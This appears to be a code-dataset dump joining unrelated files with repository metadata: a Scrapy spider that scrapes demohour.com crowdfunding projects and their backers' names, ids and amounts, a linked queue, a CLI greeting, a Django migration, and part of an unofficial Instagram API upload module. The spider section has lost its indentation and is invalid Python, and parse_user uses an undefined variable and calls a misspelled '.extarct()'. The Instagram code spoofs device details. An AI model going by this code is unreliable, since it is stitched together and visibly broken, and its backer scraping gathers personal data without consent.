log_in = re.search('[\d]+/[\d]+/[\d]+', proj_owner_last_log_in_time[0])
if log_in == None:
self.log("parse proj owner proj_owner_last_log_in_time error at page %s" %response.url)
else:
proj_owner['proj_owner_last_log_in_time'] = log_in.group(0)
proj_by_post_support_list = p.select(".//div[@class='project-by-post']/a[@target='_blank']/span/text()").extract()
proj_owner_support_proj_count = 0
proj_owner_own_proj_count = 0
if len(proj_by_post_support_list) >= 1:
proj_owner_support_proj_count = proj_by_post_support_list[0]
proj_owner['proj_owner_support_proj_count'] = proj_by_post_support_list[0]
if len(proj_by_post_support_list) >= 2:
proj_owner_own_proj_count = proj_by_post_support_list[1]
proj_owner['proj_owner_own_proj_count'] = proj_by_post_support_list[1]
print "proj owner supports:", proj_owner_support_proj_count
print "proj owner owns:", proj_owner_own_proj_count
yield proj_owner
# end of section of proj_owner_table
##################################################################################################################
##################################################################################################################
# section of donation table, we need to follow the link within the donor page (pagination)
##########################################################################################
#u'/projects/318262/backers' #
# >>> response.url #
# 'http://www.demohour.com/projects/318262' #
##########################################################################################
backers = hxs.select("//div[@class='ui-tab-layout']/ul[@class='ui-tab-menu']/li/a/@href")
if len(backers) == 3: # we have current tab, posts and backers tab
backer_relative_urls = backers[2].extract().split('/')
backer_relative_url = backer_relative_urls[len(backer_relative_urls) - 1]
backers_full_url = response.url + '/' + backer_relative_url
yield Request(backers_full_url, self.parse_backers_links)
for supporter in self.parse_backers_links(response): # we have supporter information here
print "supporter name:", supporter['supporter_name']
print "supporter url:", supporter['supporter_url']
print "supporter icon:", supporter['supporter_icon']
print "supporter support time", supporter['supporter_support_time']
print "supporter support amount", supporter['supporter_support_amount']
print "supporter support total proj count", supporter['supporter_total_support_proj']
supporter['supporter_proj_id'] = PROJ_ID
yield supporter
# end of section of donation table
##################################################################################################################
# if we want to add the user information table, we will do sth similar to the back table here
###################################################################################################################################
# section of Topic table
# (topic_proj_id(PK), topic_total_buzz_count, topic_announcement_count, topic_question_count, topic_up_count, topic_down_count, topic_proj_category, topic_proj_location )
###################################################################################################################################
projs_topic = hxs.select("//div[@class='projects-home-left']")
if len(projs_topic) == 1:
#self.log("Parse the topic at the end of the page error at url = %s" %response.url)
#else:
proj_topic = Proj_Topic()
proj_topic['topic_proj_id'] = PROJ_ID
# get the topic_total_buzz_count
topic_total_buzz_count = projs_topic.select(".//li/a[@id='filter_all']/span/text()").extract()
if len(topic_total_buzz_count) != 1:
self.log("Parse topic_total_buzz_count error at url = %s" %response.url)
else:
proj_topic['topic_total_buzz_count'] = topic_total_buzz_count[0]
topic_all_count = projs_topic.select(".//li/a[@data-remote='true']/span/text()").extract()
if len(topic_all_count) < 5:
self.log("Parse other buzz count error at url = %s" %response.url)
else:
proj_topic['topic_announcement_count'] = topic_all_count[1]
proj_topic['topic_question_count'] = topic_all_count[2]
proj_topic['topic_up_count'] = topic_all_count[3]
proj_topic['topic_down_count'] = topic_all_count[4]
# now we will get the proj tags, e.g., category, location
projs_tag = hxs.select(".//div[@class='projects-home-left-seat']/a[@target='_blank']/text()").extract()
if len(projs_tag) != 3:
self.log("Parse proj tag error at url = %s" %response.url)
return
else:
proj_topic['topic_proj_category'] = projs_tag[0]
proj_topic['topic_proj_owner_name'] = projs_tag[1]
proj_topic['topic_proj_location'] = projs_tag[2]
yield proj_topic
# yield item
###################################################################################################################################
# section of incentive/reward table
# (incentive_proj_id(PK), incentive_id(PK), incentive_expect_support_amount, incentive_current_supporter_count, incentive_total_allowable_supporter_count,
# incentive_description, incentive_reward_shipping_method, incentive_reward_shipping_time)
###################################################################################################################################
projs_reward_options = hxs.select("//div[@class='reward-options']/ul")
rewards = []
firstIncentive = True
for p in projs_reward_options:
reward = Proj_Incentive_Options_Item()
reward['incentive_proj_id'] = PROJ_ID
# get incentive_expect_support_amount
incentive_expect_support_amount = p.select(".//li[@class='support-amount']/text()[2]").extract()
print "support amount: ", incentive_expect_support_amount
if len(incentive_expect_support_amount) == 1:
reward['incentive_expect_support_amount'] = reward.clean_expect_support_amount(incentive_expect_support_amount[0])
# if len(support_amount) == 1:
# reward['incentive_expect_support_amount'] = support_amount[0]
# get incentive_current_supporter_count
incentive_current_supporter_count = p.select(".//li[@class='support-amount']/span/text()").extract()
print "supporter number:", incentive_current_supporter_count
if len(incentive_current_supporter_count) == 1:
count= reward.clean_current_supporter_count(incentive_current_supporter_count[0])
if len(count) == 1:
reward['incentive_current_supporter_count'] = count[0]
# get incentive_total_allowable_supporter_count, if any
incentive_total_allowable_supporter_count = p.select(".//li[@class='supporter-number']/div[@class='supporter-limit']/p/text()").extract()
if len(incentive_total_allowable_supporter_count) == 1:
quote = reward.clean_total_allowable_supporter_count(incentive_total_allowable_supporter_count[0])
if len(quote) >= 1:
reward['incentive_total_allowable_supporter_count'] = quote[0]
# get incentive_description,
incentive_description = p.select(".//li[@class='returns-contents']/p/text()").extract()
if len(incentive_description) >= 1:
reward['incentive_description'] = reward.clean_incentive_descriptions(incentive_description[0])
# get incentive_reward_shipping_method, if any
incentive_reward_shipping_time_and_method = p.select(".//li[@class='returns-contents-time']/p/text()").extract()
if len(incentive_reward_shipping_time_and_method) == 1:
shipping_time = reward.clean_reward_shipping_time(incentive_reward_shipping_time_and_method[0])
if len(shipping_time) >= 1:
reward['incentive_reward_shipping_time'] = shipping_time[0]
elif len(incentive_reward_shipping_time_and_method) == 2:
shipping_method = incentive_reward_shipping_time_and_method[0]
reward['incentive_reward_shipping_method'] = shipping_method
time = reward.clean_reward_shipping_time(incentive_reward_shipping_time_and_method[1])
if len(time) >= 1:
reward['incentive_reward_shipping_time'] = time[0]
rewards.append(reward)
###################################################################################################################################
# end of table incentive/reward
###################################################################################################################################
for reward in rewards:
yield reward
def parse_backers_links(self, response):
hxs = HtmlXPathSelector(response)
current_page = hxs.select("//div[@class='ui-pagination-current']/ul/li/a/@href")
# current_page = hxs.select("//div[@class='ui-pagination-next']/ul/li/a/@href")
if not not current_page:
yield Request(current_page[0], self.parse_one_supporters_page)
for item in self.parse_one_supporters_page(response):
yield item
    def parse_one_supporters_page(self, response):
        """Extract every supporter shown on one backers page and yield one
        populated Proj_Supporter item per supporter found."""
        hxs = HtmlXPathSelector(response)
        # titles = hxs.select("//span[@class='pl']")
        # avoid double parse here???
        # The project id is taken as the first run of digits in the page url;
        # -1 marks "not found" so items are still emitted with a sentinel id.
        backer_url = re.search('[0-9]+', response.url)
        PROJ_ID = -1
        if backer_url != None:
            # self.log('parse the proj_id in backer page error in %s' %response.url)
            #else:
            PROJ_ID = backer_url.group(0)
        backers = hxs.select("//div[@class='projects-backers-left']/div[@class='supporters']")
        items = []
        for backer in backers:
            item = Proj_Supporter()
            # Each selector extraction returns a (possibly empty) list; the
            # length checks below only assign fields that were actually found.
            supporter_name = backer.select(".//div[@class='supportersmeta']/div[@class='supportersmeta-t']/a[@class='supportersmeta-t-a']/text()").extract()
            supporter_id = backer.select(".//div[@class='supportersmeta']/div[@class='supportersmeta-t']/a[@class='supportersmeta-t-a']/@href").extract()
            supporter_icon = backer.select(".//div[@class='supportersmeta']/div[@class='supportersmeta-t']/div[@class='icon-sun-ms']/a/text()").extract()
            # NOTE(review): positional text() indices 2/3/4 assume a fixed
            # node layout inside div.supportersmeta -- fragile if markup changes.
            supporter_total_support_proj= backer.select(".//div[@class='supportersmeta']/text()[4]").extract()
            supporter_support_time = backer.select(".//div[@class='supportersmeta']/text()[2]").extract()
            supporter_support_amount = backer.select(".//div[@class='supportersmeta']/text()[3]").extract()
            #print "supporter name", supporter_name
            #print "supporter url", supporter_url
            #print "supporter icon level ", supporter_icon
            #print "supporter_total_support_proj ", supporter_total_support_proj
            #print "supporter_support_time ", supporter_support_time
            #print "supporter total support", supporter_support_amount
            if len(supporter_name) == 1:
                item['supporter_name'] = supporter_name[0]
            if len(supporter_id) == 1:
                item['supporter_id'] = item.clean_supporter_id(supporter_id[0])
            if len(supporter_icon) == 1:
                item['supporter_icon'] = item.clean_supporter_icon(supporter_icon[0])
            if len(supporter_support_time) == 1:
                item['supporter_support_time']= item.clean_supporter_support_time(supporter_support_time[0])
            if len(supporter_support_amount) == 1:
                item['supporter_support_amount'] = supporter_support_amount[0]
            if len(supporter_total_support_proj) == 1:
                item['supporter_total_support_proj'] = item.clean_supporter_total_support_proj(supporter_total_support_proj[0])
            item['supporter_proj_id'] = PROJ_ID
            items.append(item)
        for item in items:
            yield item
        # return items
"""
projs_time = hxs.select("//div[@class='project-by-last-time']")
item = DemonHourItem()
# section of proj homepage, determine if we have video or image
# if video, set flag =1, save the flash url
# if image, set flag = 0, save the image url
projs_project_intro_video = hxs.select("//div[@class='projects-home-synopsis']/div[@class='projects-home-left-top']/embed[@src]/text()").extract()
print "proj intro video:", projs_project_intro_video
# item['projs_project_intro_video'] = projs_project_intro_video
projs_project_intro_img = hxs.select("//div[@class='projects-home-synopsis']/div[@class='projects-home-left-top']/img[@src]/text()").extract()
print "proj intro img:", projs_project_intro_img
# item['projs_project_intro_img'] = projs_project_intro_img
# end of section proj home page
# section of div.sidebar-funding
projs_sidebar_funding = hxs.select("//div[@class='sidebar-funding']")
for p in projs_sidebar_funding:
projs_sidebar_money_raised_num_t = p.select(".//div[@class='sidebar-money-raised-num-t']").select(".//b/text()").extract()
print projs_sidebar_money_raised_num_t
# item['projs_sidebar_money_raised_num_t'] = projs_sidebar_money_raised_num_t
projs_sidebar_money_raised_num = p.select(".//div[@class='sidebar-money-raised-num']").select(".//b/text()").extract()
print projs_sidebar_money_raised_num
# item['projs_sidebar_money_raised_num'] = projs_sidebar_money_raised_num
projs_sidebar_percentage_progress_span = p.select(".//span[@class='sidebar-percentage-progress-span']/text()").extract()
print projs_sidebar_percentage_progress_span
# item['projs_sidebar_percentage_progress_span'] = projs_sidebar_percentage_progress_span
# this is how many people support this proj
projs_sidebar_number_days_1 = p.select(".//div[@class='sidebar-number-days-l']/b/b/text()").extract()
print "support num:", projs_sidebar_number_days_1
# item['projs_sidebar_number_days_1'] = projs_sidebar_number_days_1
# this is how many people view this proj
projs_sidebar_number_days_m = p.select(".//div[@class='sidebar-number-days-m']/b/b/text()").extract()
print "people view ", projs_sidebar_number_days_m
# item['projs_sidebar_number_days_m'] = projs_sidebar_number_days_m
# this is how many days left
projs_sidebar_number_days_r = p.select(".//div[@class='sidebar-number-days-r']/b/b/text()").extract()
print "days left ", projs_sidebar_number_days_r
# item['projs_sidebar_number_days_r'] = projs_sidebar_number_days_r
# end of section div.sidebar-funding
# section of proj-by where we have the proj owner information
projs_by = hxs.select("//div[@class='project-by']")
for p in projs_by:
projs_by_img_r_author = p.select(".//a[@class='project-by-img-r-author']/text()").extract()
print "proj name: ", projs_by_img_r_author
# item['projs_by_img_r_author'] = projs_by_img_r_author
projs_by_img_r_author_url = p.select(".//a[@class='project-by-img-r-author']/@href").extract()
print "proj name url: ", projs_by_img_r_author_url
# item['projs_by_img_r_author_url'] = projs_by_img_r_author_url
projs_by_last_time = p.select(".//div[@class='project-by-last-time']/text()").extract()
print "proj last update time,", projs_by_last_time
# item['projs_by_last_time'] = projs_by_last_time
proj_by_post_support = p.select(".//div[@class='project-by-post']/a[@target='_blank']/span/text()").extract()
print "proj owner owns:", proj_by_post_support
# item['proj_by_post_support'] = proj_by_post_support
# for p_sub in proj_by_post:
# proj_support_and_own = proj_by_post.select(".//span/text()/").extract()
# print "proj owner support or own:", proj_support_and_own
# end of section of proj-by where we have the proj owner information
# section div class="reward-options" save all the reward options, and the main information
# support amount and current supporter number projs_reward_supporter_count
projs_reward_options = hxs.select("//div[@class='reward-options']/ul")
reward = []
for p in projs_reward_options:
reward = RewardOption()
projs_reward_support_amount = p.select(".//li[@class='support-amount']/text()[2]").extract()
print "support amount: ", projs_reward_support_amount
reward['projs_reward_support_amount'] = projs_reward_support_amount
projs_reward_supporter_count = p.select(".//li[@class='support-amount']/span/text()").extract()
print "supporter number:", projs_reward_supporter_count
reward['projs_reward_supporter_count'] = projs_reward_supporter_count
projs_reward_supporter_limit = p.select(".//li[@class='supporter-number']/div[@class='supporter-limit']/p/text()").extract()
print "supporter number limit:", projs_reward_supporter_limit
reward['projs_reward_supporter_limit'] = projs_reward_supporter_limit
# item['projs_rewardOptions'].extend(reward)
# end of reward-option section
items = []
for i in range(1):
# we will do only once since for each projs we are expected to have one value for below items
# in xpath all elements start with index 1 rather than 0
#item = DemonHourItem()
for projs in projs:
item["owner"] = projs.select("a/text()").extract()
item["link"] = projs.select("a/@href").extract()
# print owner, link
for projs_time in projs_time:
item["last_update"] = projs_time.select("text()").extract()
# print last_update
items.append(item)
return items
"""
def parse_user(self, responser):
"""
Parse user page and populate the user information, and the refer page comes from one of the project, and it retures first the user information,
and also continue yield the project request.
"""
###################################################################################################################################
# section of user table
# (user_id, user_name, user_join_time, user_support_proj_count, user_own_proj_count, user_star_level)
# this models the regestered user, we do not track the detail proj information, but only the count information, as the support information is kept in the supporter table
# and ownership information is kept in the proj_owner_table
###################################################################################################################################
hxs = HtmlXPathSelector(response)
user = User_Item()
backer_url = re.search('[0-9]+', response.url)
PROJ_ID = -1
if backer_url != None:
user['user_id'] = backer_url.group(0)
# get the join time
user_profile = hxs.select("//div[@class='profile-bio']")
# handle the profile section
if len(user_profile) == 1:
p = user_profile[0]
user_name_tag = p.select(".//div[@class='profile-bio-r']/strong/text()").extract()
if len(user_name_tag) == 1:
user['user_name'] = user_name_tag[0]
user_star_level = p.select(".//div[@class='profile-bio-r']/div[@class='icon-sun-l']/a/text()").extract()
if len(user_star_level) == 1:
user['user_star_level'] = user_star_level[0]
user_join_time = p.select(".//p[@class='jiaru']/text()").extract()
if len(user_join_time) == 1:
user['user_join_time'] = user_join_time[0]
# now we will handle the supported prjects, caveat, we may have mutiple pages to handle
user_proj_count = hxs.select("//ul[@class='topmenutabs']")
if len(user_proj_count) == 1:
p = user_proj_count[0]
user_support_proj_count = p.select(".//li[@class='selected']/a/span/text()").extract()
if len(user_support_proj_count) == 1:
user['user_support_proj_count'] = user_support_proj_count[0]
user_own_proj_count = p.select(".//li/a[@class='select_projects']/span/text()").extarct()
if len(user_own_proj_count) == 2:
user['user_own_proj_count'] = user_own_proj_count[1]
yield user | [
"guixiz@microsoft.com"
] | guixiz@microsoft.com |
1926722da71183f936fd15d9c412fe2e5f789af4 | 35fb71dd7b67fcee5e01e090e5f2a04dbbf30a15 | /network_base/week01/day02/lqueue.py | a2b102948e76f64e135371e6dfc924f57c1832a7 | [] | no_license | zlz2013/zlz | 3119795848ed9cc43708482a2aa3e764c1312394 | 228d04a30b0782d859323e507ddd0c7459635bfb | refs/heads/master | 2020-06-05T17:44:47.975328 | 2019-09-10T11:57:23 | 2019-09-10T11:57:23 | 192,500,784 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | """
lqueue.py 链式队列
重点代码
思路分析:
1.基于链表模型完成链式栈
2.链表开端作为队头,尾端作为队尾
"""
class LQueueError(Exception):
    """Raised when an invalid operation is attempted on a linked queue."""
class Node:
    """A singly linked node: a payload plus a reference to its successor."""
    def __init__(self, data, next=None):
        # payload stored at this position in the chain
        self.data = data
        # the following node; None marks the tail of the chain
        self.next = next
#linked-queue class
class LQueue:
    """Linked queue built on Node: enqueue at the rear, dequeue at the front.

    A dummy head node (payload None) is shared by both pointers at start, so
    no special-casing is needed for the empty queue.
    """
    def __init__(self):
        # Both ends start at the same dummy node with no meaningful payload.
        self.front = self.rear = Node(None)
    def is_empty(self):
        """The queue is empty when front has caught up with rear."""
        return self.front == self.rear
    def enqueue(self, elem):
        """Append elem at the rear (the rear pointer advances)."""
        fresh = Node(elem)
        self.rear.next = fresh
        self.rear = fresh
    def dequeue(self):
        """Pop and return the front element (the front pointer advances).

        Raises LQueueError when the queue is empty.
        """
        if self.is_empty():
            raise LQueueError("Queue is empty")
        self.front = self.front.next
        # The popped node becomes the new dummy head; its payload is returned.
        return self.front.data
if __name__=="__main__":
lq=LQueue()
lq.enqueue(10)
lq.enqueue(20)
lq.enqueue(30)
while not lq.is_empty():
print(lq.dequeue()) | [
"229165631@qq.com"
] | 229165631@qq.com |
362ffe4c25bda56646b8da422d6aabfb857c97ff | e86ffb722f7fd243ab2bc0b3e20763ab8f74b034 | /brain_games/cli.py | 4242fe41eaf49bb9ed1683159b47e3f7e745d99e | [] | no_license | ivan-shumilin/python-project-lvl1-v2 | 88ed921fac148df889974ce79623d9f7841cdd9b | 3e09daf9ba749fdfa448fd37f9b4c0956be35657 | refs/heads/main | 2023-08-04T05:11:39.716275 | 2021-09-21T15:21:02 | 2021-09-21T15:21:02 | 407,498,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | """Function welcom_user."""
import prompt
def welcome_user():
"""Print welcome."""
name = prompt.string('May I have your name? ')
print('Hello, {0}!'.format(name)) # Noqa:WPS421
| [
"shumilin.i.v@gmail.com"
] | shumilin.i.v@gmail.com |
2ac67697625c5683ebdb5b5288b6b5a298e1b8ee | 270ad55914ca6c1b75c2ef694db992d1f4443dfb | /restfultv_app/migrations/0001_initial.py | 85a67bb44c8d2d37b5a61acad456a5587734234f | [] | no_license | alitahir6001/semirest_tv | a53a974b82f7f0059a37f15724ab91224d13f839 | b908d18bbe766e8f11bbce4e5eaba693257452c9 | refs/heads/master | 2023-06-10T07:15:10.700424 | 2021-07-01T21:03:11 | 2021-07-01T21:03:11 | 322,084,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 795 | py | # Generated by Django 2.2.4 on 2020-12-16 01:48
from django.db import migrations, models
# Auto-generated Django migration; normally regenerated with
# `manage.py makemigrations` rather than edited by hand.
class Migration(migrations.Migration):
    # First migration of this app, so there is nothing to depend on.
    initial = True
    dependencies = [
    ]
    operations = [
        # Creates the `Show` table: title/network text columns, a release
        # date, a free-form description, and auto-managed timestamps.
        migrations.CreateModel(
            name='Show',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=45)),
                ('network', models.CharField(max_length=45)),
                ('release_date', models.DateField()),
                ('description', models.TextField()),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
            ],
        ),
    ]
| [
"alitahir6001@gmail.com"
] | alitahir6001@gmail.com |
a3cf0ec1a60c0488d760b56a6bbf60c6b1bb6c07 | 91863aa943df50cdcf3b8965239eb4c8b5688e0b | /examenrecuperacion.py | 9efd342ed6ad4d564b4836fe578083a85cae9c34 | [] | no_license | Danemora23/ExamenRecuperacion | dc2428b675bf72da600b6c06ac7b5fc02e7736e9 | 3bc3478b670b174156183176a4201e3471efe25f | refs/heads/master | 2020-06-08T13:40:22.580022 | 2019-06-22T16:40:30 | 2019-06-22T16:40:30 | 193,237,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,424 | py | #Logica de sistemas
#primer semestre
#Darwin Daneri Morales López
#0907-19-11615
from tkinter import ttk
from tkinter import *
class Desk:
    """Small Tkinter exam app: three numeric entry fields plus two buttons
    that display a computed result in a message label."""
    def __init__(self, window):
        # window width in pixels
        ancho = 400
        # window height in pixels
        alto = 250
        # keep the Tk root window on the instance as `wind`
        self.wind = window
        # apply the width and height via the geometry property
        self.wind.geometry(str(ancho)+'x'+str(alto))
        # center the content
        self.wind.columnconfigure(0, weight=1)
        # give the window a title
        self.wind.title('EXAMEN RECUPERACION')
        # create a container frame
        frame = LabelFrame(self.wind, text = 'EXAMEN RECUPERACION')
        frame.grid(row = 0, column = 0, columnspan = 3, pady = 20)
        # create a label for the first input
        Label(frame, text = '1er Numero: ').grid(row = 1, column = 0)
        # create an entry widget where values are typed
        self.var1 = Entry(frame)
        self.var1.focus()
        self.var1.grid(row = 1, column = 1)
        # as above: a label and an entry for the second value
        # NOTE(review): each Entry calls .focus(); only the last call wins.
        Label(frame, text = '2do Numero: ').grid(row = 2, column = 0)
        self.var2 = Entry(frame)
        self.var2.focus()
        self.var2.grid(row = 2, column = 1)
        # as above: a label and an entry for the third value
        Label(frame, text = '3er Numero: ').grid(row = 3, column = 0)
        self.var3 = Entry(frame)
        self.var3.focus()
        self.var3.grid(row = 3, column = 1)
        # create button 1 (bound to sumar)
        Button(frame, text = 'Boton 1', command = self.sumar).grid(row = 5, columnspan =2, sticky = W + E)
        # create button 2 (bound to resta)
        Button(frame, text = 'Boton 2', command = self.resta).grid(row = 6, columnspan =2, sticky = W + E)
        # designate a message area for results/errors
        # NOTE(review): gridded at row 3, which the third input row also uses
        # -- confirm the intended layout.
        self.message = Label(text = '', fg = 'red')
        self.message.grid(row = 3, column = 0, columnspan = 2, sticky = W + E)
    # validate that none of the three fields is blank
    def validation(self):
        return len(self.var1.get()) != 0 and len(self.var2.get()) != 0 and len(self.var3.get()) != 0
    # handler for the first button
    # NOTE(review): despite the name ("sumar" = add) this multiplies the
    # three fields -- the displayed message also says multiplication.
    def sumar(self):
        if self.validation():
            resultado = float( self.var1.get() ) * float( self.var2.get() ) * float( self.var3.get() )
            self.message['text'] = 'multiplicación de los 3 campos:{}'.format(resultado)
        else:
            self.message['text'] = 'los campos requeridos'
    # handler for the second button
    # NOTE(review): despite the name ("resta" = subtract) this compares
    # field 1 > field 2 and displays the boolean -- confirm the intent.
    def resta(self):
        if self.validation():
            resultado = float( self.var1.get() ) > float( self.var2.get() )
            self.message['text'] = 'CONCATENAR:{}'.format(resultado)
        else:
            self.message['text'] = 'los campos requeridos'
#check whether this module is the program entry point
if __name__ == '__main__':
    #bind the Tk root window to the variable `window`
    window = Tk()
    #instantiate the Desk class, passing the window as a parameter
    app = Desk(window)
    #run mainloop so the window is displayed and events are processed
    window.mainloop()
"noreply@github.com"
] | noreply@github.com |
93a8bc8d49919f8877dea6d420bb5f3010c25371 | 43625b3ef2c599920d0b5044c49537ed90cfada2 | /instagram_private_api/endpoints/upload.py | c35272273dc868573fadbf14388efcb1d269baab | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | comtong/instagram_graw_fans | adc5225e8a3339b96327673758db08dce6375dd0 | 2b9ecdf957acecab1adb222664f8cea5cbb42889 | refs/heads/master | 2021-01-06T20:40:37.980950 | 2017-09-18T12:49:50 | 2017-09-18T12:49:50 | 99,544,073 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31,727 | py | import json
import time
from random import randint
import re
import warnings
from ..compat import compat_urllib_error, compat_urllib_request
from ..errors import ClientError
from ..http import MultipartFormDataEncoder
from ..utils import (
max_chunk_count_generator, max_chunk_size_generator,
get_file_size
)
from ..compatpatch import ClientCompatPatch
from .common import ClientDeprecationWarning
from .common import MediaTypes
class MediaRatios(object):
    """
    Class holding valid aspect ratios (width: height) for media uploads.
    """
    # Based on IG sampling
    # and from https://help.instagram.com/1469029763400082
    #: Acceptable min, max values of with/height ratios for a standard media upload
    standard = 4.0 / 5.0, 90.0 / 47.0

    # Common device screen proportions as (width, height) pairs; the story
    # bounds below are derived from the extreme ratios among these.
    __device_sizes = [(3, 4), (2, 3), (5, 8), (3, 5), (9, 16), (10, 16), (40, 71)]
    __ratios = [1.0 * w / h for w, h in __device_sizes]

    #: Acceptable min, max values of with/height ratios for a story upload
    reel = min(__ratios), max(__ratios)
class UploadEndpointsMixin(object):
"""For endpoints relating to upload functionality."""
EXTERNAL_LOC_SOURCES = {
'foursquare': 'foursquare_v2_id',
'facebook_places': 'facebook_places_id',
'facebook_events': 'facebook_events_id'
}
def _validate_location(self, location):
"""
Validates and patches a location dict for use with the upload functions
:param location: dict containing location info
:return:
"""
location_keys = ['external_source', 'name', 'address']
if not isinstance(location, dict):
raise ValueError('Location must be a dict.')
# patch location object returned from location_search
if 'external_source' not in location and 'external_id_source' in location and 'external_id' in location:
external_source = location['external_id_source']
location['external_source'] = external_source
if external_source in self.EXTERNAL_LOC_SOURCES:
location[self.EXTERNAL_LOC_SOURCES[external_source]] = location['external_id']
for k in location_keys:
if not location.get(k):
raise ValueError('Location dict must contain "{0!s}".'.format(k))
for k, val in self.EXTERNAL_LOC_SOURCES.items():
if location['external_source'] == k and not location.get(val):
raise ValueError('Location dict must contain "{0!s}".'.format(val))
media_loc = {
'name': location['name'],
'address': location['lat'],
'external_source': location['external_source'],
}
if 'lat' in location and 'lng' in location:
media_loc['lat'] = location['lat']
media_loc['lng'] = location['lng']
for k, val in self.EXTERNAL_LOC_SOURCES.items():
if location['external_source'] == k:
media_loc['external_source'] = k
media_loc[val] = location[val]
return media_loc
@staticmethod
def standard_ratios(): # pragma: no cover
"""
Deprecated. Use MediaRatios.standard instead.
Acceptable min, max values of with/height ratios for a standard media upload
:return: tuple of (min. ratio, max. ratio)
"""
warnings.warn(
'Client.standard_ratios() is deprecated. '
'Please use MediaRatios.standard instead.',
ClientDeprecationWarning
)
return MediaRatios.standard
@staticmethod
def reel_ratios(): # pragma: no cover
"""
Deprecated. Use MediaRatios.reel instead.
Acceptable min, max values of with/height ratios for a story upload
:return: tuple of (min. ratio, max. ratio)
"""
warnings.warn(
'Client.reel_ratios() is deprecated. '
'Please use MediaRatios.reel instead.',
ClientDeprecationWarning
)
return MediaRatios.reel
@classmethod
def compatible_aspect_ratio(cls, size):
"""
Helper method to check aspect ratio for standard uploads
:param size: tuple of (width, height)
:return: True/False
"""
min_ratio, max_ratio = MediaRatios.standard
width, height = size
this_ratio = 1.0 * width / height
return min_ratio <= this_ratio <= max_ratio
@classmethod
def reel_compatible_aspect_ratio(cls, size):
"""
Helper method to check aspect ratio for story uploads
:param size: tuple of (width, height)
:return: True/False
"""
min_ratio, max_ratio = MediaRatios.reel
width, height = size
this_ratio = 1.0 * width / height
return min_ratio <= this_ratio <= max_ratio
def configure(self, upload_id, size, caption='', location=None,
disable_comments=False, is_sidecar=False):
"""
Finalises a photo upload. This should not be called directly.
Use :meth:`post_photo` instead.
:param upload_id:
:param size: tuple of (width, height)
:param caption:
:param location: a dict of venue/location information,
from :meth:`location_search` or :meth:`location_fb_search`
:param disable_comments:
:param is_sidecar: bool flag for album upload
:return:
"""
if not self.compatible_aspect_ratio(size):
raise ValueError('Incompatible aspect ratio.')
endpoint = 'media/configure/'
width, height = size
params = {
'caption': caption,
'media_folder': 'Instagram',
'source_type': '4',
'upload_id': upload_id,
'device': {
'manufacturer': self.phone_manufacturer,
'model': self.phone_device,
'android_version': self.android_version,
'android_release': self.android_release
},
'edits': {
'crop_original_size': [width * 1.0, height * 1.0],
'crop_center': [0.0, -0.0],
'crop_zoom': 1.0
},
'extra': {
'source_width': width,
'source_height': height,
}
}
if location:
media_loc = self._validate_location(location)
params['location'] = json.dumps(media_loc)
if 'lat' in location and 'lng' in location:
params['geotag_enabled'] = '1'
params['exif_latitude'] = '0.0'
params['exif_longitude'] = '0.0'
params['posting_latitude'] = str(location['lat'])
params['posting_longitude'] = str(location['lng'])
params['media_latitude'] = str(location['lat'])
params['media_latitude'] = str(location['lng'])
if disable_comments:
params['disable_comments'] = '1'
if is_sidecar:
return params
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
if self.auto_patch and res.get('media'):
ClientCompatPatch.media(res.get('media'), drop_incompat_keys=self.drop_incompat_keys)
return res
def configure_video(self, upload_id, size, duration, thumbnail_data, caption='',
location=None, disable_comments=False, is_sidecar=False):
"""
Finalises a video upload. This should not be called directly.
Use :meth:`post_video` instead.
:param upload_id:
:param size: tuple of (width, height)
:param duration: in seconds
:param thumbnail_data: byte string of thumbnail photo
:param caption:
:param location: a dict of venue/location information,
from :meth:`location_search` or :meth:`location_fb_search`
:param disable_comments:
:param is_sidecar: bool flag for album upload
:return:
"""
if not self.compatible_aspect_ratio(size):
raise ValueError('Incompatible aspect ratio.')
# upload video thumbnail
self.post_photo(thumbnail_data, size, caption, upload_id, location=location,
disable_comments=disable_comments, is_sidecar=is_sidecar)
width, height = size
params = {
'upload_id': upload_id,
'caption': caption,
'source_type': '3',
'poster_frame_index': 0,
'length': duration * 1.0,
'audio_muted': False,
'filter_type': '0',
'video_result': 'deprecated',
'clips': {
'length': duration * 1.0,
'source_type': '3',
'camera_position': 'back'
},
'device': {
'manufacturer': self.phone_manufacturer,
'model': self.phone_device,
'android_version': self.android_version,
'android_release': self.android_release
},
'extra': {
'source_width': width,
'source_height': height
}
}
if disable_comments:
params['disable_comments'] = '1'
if location:
media_loc = self._validate_location(location)
params['location'] = json.dumps(media_loc)
if 'lat' in location and 'lng' in location:
params['geotag_enabled'] = '1'
params['av_latitude'] = '0.0'
params['av_longitude'] = '0.0'
params['posting_latitude'] = str(location['lat'])
params['posting_longitude'] = str(location['lng'])
params['media_latitude'] = str(location['lat'])
params['media_latitude'] = str(location['lng'])
if is_sidecar:
return params
params.update(self.authenticated_params)
res = self._call_api('media/configure/', params=params, query={'video': 1})
if res.get('media') and self.auto_patch:
ClientCompatPatch.media(res.get('media'), drop_incompat_keys=self.drop_incompat_keys)
return res
    def configure_to_reel(self, upload_id, size):
        """
        Finalises a photo story upload. This should not be called directly.
        Use :meth:`post_photo_story` instead.

        :param upload_id: upload session id of the previously uploaded photo
        :param size: tuple of (width, height)
        :return: configure API response dict
        :raises ValueError: when the aspect ratio is not story-compatible
        """
        if not self.reel_compatible_aspect_ratio(size):
            raise ValueError('Incompatible aspect ratio.')

        endpoint = 'media/configure_to_story/'
        width, height = size
        params = {
            'source_type': '4',
            'upload_id': upload_id,
            # Timestamps are staggered by small random offsets, presumably to
            # mimic the official app's capture/share/post timing -- confirm.
            'story_media_creation_date': str(int(time.time()) - randint(11, 20)),
            'client_shared_at': str(int(time.time()) - randint(3, 10)),
            'client_timestamp': str(int(time.time())),
            'configure_mode': 1,    # 1 - REEL_SHARE, 2 - DIRECT_STORY_SHARE
            'device': {
                'manufacturer': self.phone_manufacturer,
                'model': self.phone_device,
